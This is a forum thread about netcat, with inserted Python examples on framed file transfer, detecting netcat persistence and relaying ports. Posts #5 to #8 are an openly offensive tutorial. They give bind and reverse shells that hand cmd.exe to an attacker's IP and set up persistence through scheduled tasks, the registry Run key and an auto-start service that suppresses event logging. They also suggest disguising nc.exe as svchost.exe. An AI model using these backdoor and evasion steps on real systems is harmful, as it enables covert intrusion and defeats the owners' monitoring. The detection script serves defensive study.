
Thread: NetCat - The Swiss Army Knife

  1. #1
    Garage Member D4rk357's Avatar
    Join Date
    Jul 2010
    Location
    localhost@mumbai
    Posts
    153
    Blog Entries
    1

    NetCat - The Swiss Army Knife

    < Originally Posted by b0nd >

    It is said that this small tool has as many different usages as its users can think of.
    It was developed in the late 90's and is no longer supported by its author. Anyway, it has great features, and advanced clones of it have been developed by others, e.g. cryptcat, sbd, ncat (comes with Nmap), etc.

    Let's put all the info which we have about the usage of netcat in this thread and give this tool the respect which it deserves.

  2. #2
    D4rk357
    NetCat - as chat application
    To use netcat as a chat application between two systems, the following could be done:


    Run the following at Server side:
    # nc -v -l -p <port_no>
    e.g # nc -v -l -p 8080


    -v : Verbose
    -l : It's small 'L'. It stands for "Listen mode". That is, nc is being asked to listen on a port specified after the parameter '-p'
    -p : Port number to listen on

    So by this time netcat has started listening on the server on port 8080 and is awaiting someone to connect to it.


    Run the following at Client side:
    # nc -v <IP-of-Server> <port_no>
    e.g. # nc -v 192.168.1.5 8080


    IP: IP of the machine which has netcat in listening mode
    Port: Port on which the remote machine is awaiting a connection

    After the connection has been established, you would be able to send chat data over the network between the two machines.

    Drawbacks:
    1. Text is sent as unencrypted data, hence it could be sniffed
    2. Chatting is not very appealing.
    3. The server should have a public IP to listen on, or port forwarding is needed at the gateway of the NATed network.

    The SBD tool is much better for chat: it has encrypted transfer, and "chat-ids" can be specified using it.

  3. #3
    D4rk357
    Netcat Cheat Sheet (Contributed by eberly)

    http://www.sans.org/security-resourc...t_sheet_v1.pdf

  4. #4
    D4rk357
    Transferring Files using Netcat
    Pulling a file from the Server
    • Server: # nc -v -l -p 8080 < some_file_at_server
    • Client: # nc -v [IP-of-Server] 8080 > some_file_at_client
    • When the connection to the server is established, the file from the server will be transferred to the client side and will be named some_file_at_client.

    Pushing to the Server
    • Server: # nc -v -l -p 8080 > some_file_at_server
    • Client: # nc -v [IP-of-Server] 8080 < some_file_at_client
    • When the connection to the server is established, the file from the client will be transferred to the server and will be named some_file_at_server.


    Any file can be transferred, be it text, rar, html, etc.
    Applicable to both the Linux and Windows versions of Netcat.

    Drawbacks:
    1. Traffic is not encrypted
    2. No way of knowing whether the transfer has completed. It won't display any message, and it won't break the connection. Based on the size of the file and by monitoring the traffic, it can be determined whether the file has been transferred or not.
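The push and pull above (and the chat in post #2) are netcat copying stdin to a socket and the socket to stdout, so the receiver never learns whether the stream ended because the file was done or because the sender died. The following is an added example, not code from the thread, written in Python so it runs without a netcat binary (Python is used for all added examples on this page): it frames the file with its length and a SHA-256 digest, so the receiving side can distinguish "complete and intact" from "connection went quiet", which is the second drawback above. Everything runs on loopback with an ephemeral port, and the payload is constructed; no host or port from the posts is used.

```python
# Added example, not from the original thread: a file push over one TCP connection
# with a length + SHA-256 header, so the receiver can tell "complete and intact"
# from "connection went quiet", which plain `nc > file` cannot. Loopback only.
import hashlib
import socket
import struct
import threading

HEADER = struct.Struct("!Q32s")  # 8-byte big-endian length, 32-byte SHA-256 digest


def send_file(sock: socket.socket, data: bytes) -> str:
    """Send one framed file; returns the hex digest that was sent."""
    digest = hashlib.sha256(data).digest()
    sock.sendall(HEADER.pack(len(data), digest) + data)
    return digest.hex()


def recv_exact(sock: socket.socket, n: int) -> bytes:
    """Read exactly n bytes, or raise if the peer closes early."""
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(min(65536, n - len(buf)))
        if not chunk:
            raise ConnectionError("peer closed after %d of %d bytes" % (len(buf), n))
        buf += chunk
    return bytes(buf)


def recv_file(sock: socket.socket) -> bytes:
    """Read one framed file and verify its digest."""
    length, expected = HEADER.unpack(recv_exact(sock, HEADER.size))
    data = recv_exact(sock, length)
    if hashlib.sha256(data).digest() != expected:
        raise ValueError("digest mismatch: file corrupted in transit")
    return data


def push_over_loopback(data: bytes):
    """Server side plays `nc -l -p PORT > file`, client side plays `nc HOST PORT < file`."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))  # port 0: the kernel picks a free port
    listener.listen(1)
    port = listener.getsockname()[1]
    result = {}

    def server():
        conn, _ = listener.accept()
        with conn:
            result["data"] = recv_file(conn)

    t = threading.Thread(target=server)
    t.start()
    with socket.create_connection(("127.0.0.1", port)) as client:
        sent_digest = send_file(client, data)
    t.join()
    listener.close()
    return result["data"], sent_digest


def truncation_is_detected() -> bool:
    """Sender dies after 5 of 10 bytes: recv_file must raise, not keep a partial file."""
    a, b = socket.socketpair()
    a.sendall(HEADER.pack(10, hashlib.sha256(b"0123456789").digest()) + b"01234")
    a.close()
    try:
        recv_file(b)
        return False
    except ConnectionError:
        return True
    finally:
        b.close()


if __name__ == "__main__":
    payload = b"constructed sample file contents\n" * 4000  # constructed, not a real file
    received, digest = push_over_loopback(payload)
    print("received %d bytes, sha256 %s, %s" % (len(received), digest,
          "intact" if received == payload else "MISMATCH"))
    print("truncation detected:", truncation_is_detected())
```

The header is the whole point: with raw netcat the only completion signal is the TCP close, and a sender that crashes produces exactly the same close as one that finished. Comparing `sha256sum` on both sides after a plain `nc` transfer gives the same integrity guarantee by hand; it does not help with encryption, which is the first drawback and is the reason the thread points at sbd and cryptcat.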

  5. #5
    D4rk357
    NetCat as backdoor
    Direct binding

    • Run NC as a daemon waiting for incoming connection

    # nc -d -L -p 8080 -e cmd.exe

    • -d: detach from console, make it as background process
    • -L: listen harder, i.e. if the connection is disconnected, it will start listening again. This feature was available in the Windows version only, but some newer versions for Linux have it as well.
    • -e : Inbound program to execute


    In the case of Linux: instead of cmd.exe, run /bin/bash or /bin/sh, etc.

    ___________________________________________________________

    Reverse binding
    • # nc -d <our IP> <our port> -e cmd.exe
    • # nc -d <our IP> <our port> -e %SystemRoot%\System32\cmd.exe
    • # nc -d <our IP> <our port> -e %COMSPEC%

    • The drawback with this connection method is that we have to wait until an event (Task Scheduler) or a user-driven action (logging on to the system or rebooting the computer) triggers our backdoor command to connect to the NC listener on our attack system. Bottom line: netcat has to be triggered on the remote machine.

  6. #6
    D4rk357
    Triggering netcat as a back door
    A couple of ways to trigger netcat as a back door:

    _____________________

    1. Executing the back door using Windows Task Scheduler
    >> Check whether Task Scheduler is "enabled"
    c:\ at

    >> Enabling the Task Scheduler if "disabled"
    c:\ net start schedule

    >> Adding the schedule for netcat (back door)
    c:\ at 15:00:00 /every:m,t,w,th,f,s,su "c:\<path>\nc.exe -d <IP for reverse connect> <port_no> -e cmd.exe"

    >> Check the scheduler again to verify the new job has been added properly; in case of a mistake, delete the job and make a new one.
    c:\ at [id-of-your-job] /delete

    Note: To be more stealthy, rename nc.exe to some Windows process name and also make a copy of cmd.exe, e.g. rename nc.exe to svchost.exe and cmd.exe to explorer.exe. But make sure you don't mess up the original Windows files: just make copies of them and keep them in a separate folder.

  7. #7
    D4rk357
    2. Executing the back door using a Registry Entry

    The back door would be triggered when the user logs on to the system.
    Add the registry value like the following from the command prompt:

    c:\ reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v netcat /t REG_SZ /d "c:\<path>\nc.exe -d <IP_for_reverse_connect> <remote_port> -e cmd.exe"

    As stated, the back door would be executed when someone logs into the system and you would leverage their "privilege", i.e. you could have normal user privileges or administrator privileges depending on the privilege of the user logging in.

    Drawback: If the shell has been lost, you have to wait for the user to log off and log in again to trigger the back door connection.

  8. #8
    D4rk357
    3. Executing the backdoor using a Windows Service

    >> Creating the new service (our backdoor) using the Windows SC tool
    c:\ sc create netcat-backdoor binPath= "cmd /K start c:\[path]\nc.exe -d [IP-for-reverse-connect] [remote-port] -e cmd.exe" start= auto error= ignore

    *The service name would be "netcat-backdoor", so better choose some stealthy name.
    start= auto: Would start the back door automatically on boot
    error= ignore: Don't send errors to the system event logs

    >> Start the service
    c:\ net start [service-name]

    Netcat is not meant to be run as a service and will throw an error at this stage, but it will still shovel a shell. With every reboot a shell would be smiling at you.

    Drawback: If the shell is lost, you will have to wait for the server to be rebooted (which could be a couple of months as well)


    --> Obviously the techniques mentioned are generic ones and can be used for any backdoor.
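The three triggers in posts #6, #7 and #8 (scheduled job, Run value, service) leave artifacts that `at`, `reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run` and `sc qc <service>` will print, which is where a responder looks for them. The following is an added example, not from the thread, in Python (the language used for all added examples on this page): it scans constructed text shaped like that output and flags command lines that match what the posts describe: a netcat-family binary name, `-e <program>`, `-L` or `-l -p`, a reverse-connect `<ip> <port>` pair, or a system-process name launched from outside the folder it really lives in (the renaming trick from the note in post #6). The sample entries, service and value names, paths and the address 10.0.0.5:4444 are invented for the example; the real tools' output differs in headers, locale and spacing, so the regexes are a starting point rather than a parser for those tools.

```python
# Added example, not from the original posts: triage the three persistence spots
# the thread uses (Run value, scheduled job, service) for a netcat-style backdoor.
# The inputs are constructed to look like `reg query`, `at` and `sc qc` output;
# real output differs in headers, locale and spacing, so adapt the parsers.
import re
from typing import Iterator, List, Tuple

NETCAT_NAMES = re.compile(r"\b(nc|ncat|netcat|sbd|cryptcat)(\.exe)?\b", re.I)
EXEC_FLAG = re.compile(r"(?:^|\s)-[a-z]*e\s+(\S+)", re.I)                   # -e <program>
LISTEN_FLAG = re.compile(r"(?:^|\s)-[a-z]*l[a-z]*\s+-p\s+\d+|(?:^|\s)-L\b")  # -l -p N / -L
REVERSE_TARGET = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})\s+(\d{1,5})\b")       # <ip> <port>
WIN_PATH = re.compile(r"[a-z]:\\[^\s\"']+", re.I)
# Names post #6 suggests copying nc.exe / cmd.exe to, and the folder the real one lives in.
SYSTEM_NAMES = {"svchost.exe": r"c:\windows\system32", "explorer.exe": r"c:\windows"}


def assess(command: str) -> List[str]:
    """Reasons a command line looks like a netcat backdoor; empty list means nothing seen."""
    reasons = []
    if NETCAT_NAMES.search(command):
        reasons.append("netcat-family binary")
    m = EXEC_FLAG.search(command)
    if m:
        reasons.append("-e hands the connection to %s" % m.group(1))
    if LISTEN_FLAG.search(command):
        reasons.append("binds a listening port (direct backdoor)")
    m = REVERSE_TARGET.search(command)
    if m:
        reasons.append("reverse-connects to %s:%s" % (m.group(1), m.group(2)))
    for path in WIN_PATH.findall(command):
        folder, _, name = path.lower().rpartition("\\")
        if name in SYSTEM_NAMES and folder != SYSTEM_NAMES[name]:
            reasons.append("%s launched from %s instead of %s" % (name, folder, SYSTEM_NAMES[name]))
    return reasons


def run_key_values(reg_query_output: str) -> Iterator[Tuple[str, str]]:
    """(value name, data) pairs from `reg query ...\\Run` style output."""
    for line in reg_query_output.splitlines():
        m = re.match(r"\s+(\S+)\s+REG_(?:EXPAND_)?SZ\s+(.*\S)", line)
        if m:
            yield m.group(1), m.group(2)


def at_jobs(at_output: str) -> Iterator[Tuple[str, str]]:
    """(job id, command line) pairs from `at` style output: [status] id day time command."""
    for line in at_output.splitlines():
        m = re.match(r"\s*(?:\w+\s+)?(\d+)\s+(.*?)\s+(\d{1,2}:\d{2}\s*[AP]M)\s+(.*\S)", line, re.I)
        if m:
            yield m.group(1), m.group(4)


def service_binpaths(sc_qc_output: str) -> Iterator[Tuple[str, str]]:
    """(service name, BINARY_PATH_NAME) pairs from one or more `sc qc` outputs."""
    name = "?"
    for line in sc_qc_output.splitlines():
        m = re.match(r"\s*SERVICE_NAME:\s*(\S+)", line)
        if m:
            name = m.group(1)
        m = re.match(r"\s*BINARY_PATH_NAME\s*:\s*(.*\S)", line)
        if m:
            yield name, m.group(1)


def scan(reg_query_output: str, at_output: str, sc_qc_output: str):
    """All suspicious (location, command, reasons) triples across the three sources."""
    sources = (("Run value", run_key_values(reg_query_output)),
               ("at job", at_jobs(at_output)),
               ("service", service_binpaths(sc_qc_output)))
    hits = []
    for label, pairs in sources:
        for name, command in pairs:
            reasons = assess(command)
            if reasons:
                hits.append(("%s %s" % (label, name), command, reasons))
    return hits


# Constructed samples (not captured from a real host); shaped like the tools' output.
REG_SAMPLE = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    Updater    REG_SZ    c:\program files\vendor\updater.exe /background
    netcat    REG_SZ    c:\tools\nc.exe -d 10.0.0.5 4444 -e cmd.exe
"""
AT_SAMPLE = r"""
Status ID   Day                     Time          Command Line
        1   Each M T W Th F S Su    3:00 PM       c:\windows\temp\svchost.exe -d 10.0.0.5 4444 -e explorer.exe
"""
SC_SAMPLE = r"""
SERVICE_NAME: WinUpdateSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : cmd /K start c:\tools\nc.exe -d 10.0.0.5 4444 -e cmd.exe
"""

if __name__ == "__main__":
    for where, command, reasons in scan(REG_SAMPLE, AT_SAMPLE, SC_SAMPLE):
        print("%s: %s\n    %s" % (where, command, "; ".join(reasons)))
```

The renamed copy in the `at` sample carries no netcat name at all and executes `explorer.exe` (the renamed cmd.exe), so the only things that give it away are the `-e` flag, the `<ip> <port>` pair and a `svchost.exe` living in `c:\windows\temp`; the reverse-connect address is also the value to block at the egress firewall while the host is being cleaned.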

  9. #9

    Port forwarding using NetCat

    Port Forwarding or Port Mapping
    On Linux, NetCat can be used for port forwarding. Below are nine different ways to do port forwarding with NetCat:
    nc -l -p port1 -c ' nc -l -p port2'
    nc -l -p port1 -c ' nc host2 port2'
    nc -l -p port1 -c ' nc -u -l -p port2'
    nc -l -p port1 -c ' nc -u host2 port2'
    nc host1 port1 -c ' nc host2 port2'
    nc host1 port1 -c ' nc -u -l -p port2'
    nc host1 port1 -c ' nc -u host2 port2'
    nc -u -l -p port1 -c ' nc -u -l -p port2'
    nc -u -l -p port1 -c ' nc -u host2 port2'

    ---------------------------------------------------------------------------------
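Each line above chains two netcats with `-c`, so whatever the first one accepts or connects to is written into the second, in both directions; `-c`, like `-e`, exists only in netcat builds compiled with the GAPING_SECURITY_HOLE option, so the commands fail on an OpenBSD-style netcat without it. The following is an added example, not from the post, in Python (the language used for all added examples on this page): the first, TCP-to-TCP case, `nc -l -p port1 -c 'nc host2 port2'`, as a relay that accepts on port1 and bridges to host2:port2, with an echo server standing in for host2:port2 so the whole exchange runs on loopback. Ports are ephemeral and the payload is constructed.

```python
# Added example, not from the original post: the TCP-to-TCP case of
#   nc -l -p port1 -c 'nc host2 port2'
# as a relay, with an echo server standing in for host2:port2. Loopback only.
import socket
import threading


def pump(src: socket.socket, dst: socket.socket) -> int:
    """Copy src -> dst until src hits EOF, then half-close dst. Returns bytes copied."""
    total = 0
    try:
        while True:
            chunk = src.recv(65536)
            if not chunk:
                break
            dst.sendall(chunk)
            total += len(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)  # pass the EOF on, like nc closing its output side
        except OSError:
            pass
    return total


def bridge(client: socket.socket, target) -> None:
    """What `-c 'nc host2 port2'` does: connect onward and pump both directions."""
    with socket.create_connection(target) as upstream:
        back = threading.Thread(target=pump, args=(upstream, client))
        back.start()
        pump(client, upstream)
        back.join()


def echo(conn: socket.socket) -> None:
    """Stand-in for host2:port2: send back whatever arrives."""
    pump(conn, conn)


def listen_loopback() -> socket.socket:
    s = socket.socket()
    s.bind(("127.0.0.1", 0))  # port 0: ephemeral port chosen by the kernel
    s.listen(1)
    return s


def serve_once(listener: socket.socket, handler) -> None:
    conn, _ = listener.accept()
    with conn:
        handler(conn)


def forward_through_relay(payload: bytes) -> bytes:
    """Client -> relay (port1) -> echo (host2:port2) -> relay -> client; returns what came back."""
    echo_l, relay_l = listen_loopback(), listen_loopback()
    host2_port2 = echo_l.getsockname()
    workers = [
        threading.Thread(target=serve_once, args=(echo_l, echo)),
        threading.Thread(target=serve_once, args=(relay_l, lambda c: bridge(c, host2_port2))),
    ]
    for w in workers:
        w.start()
    received = bytearray()
    with socket.create_connection(relay_l.getsockname()) as client:
        client.sendall(payload)
        client.shutdown(socket.SHUT_WR)  # EOF on the first nc's stdin
        while True:
            chunk = client.recv(65536)
            if not chunk:
                break
            received += chunk
    for w in workers:
        w.join()
    echo_l.close()
    relay_l.close()
    return bytes(received)


if __name__ == "__main__":
    probe = b"constructed probe line\n" * 100  # constructed payload
    out = forward_through_relay(probe)
    print("relayed %d bytes, echoed back %s" % (len(probe), "intact" if out == probe else "CORRUPT"))
```

The half-close in `pump` is what makes the relay behave like the netcat chain: when one side sends EOF, only the write direction toward the other side is shut down, so replies still in flight are delivered before the connection is torn down. The listener-to-listener and UDP variants in the post differ only in which side each half of the bridge binds or connects to and in the socket type.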

  10. #10
    tfs................................
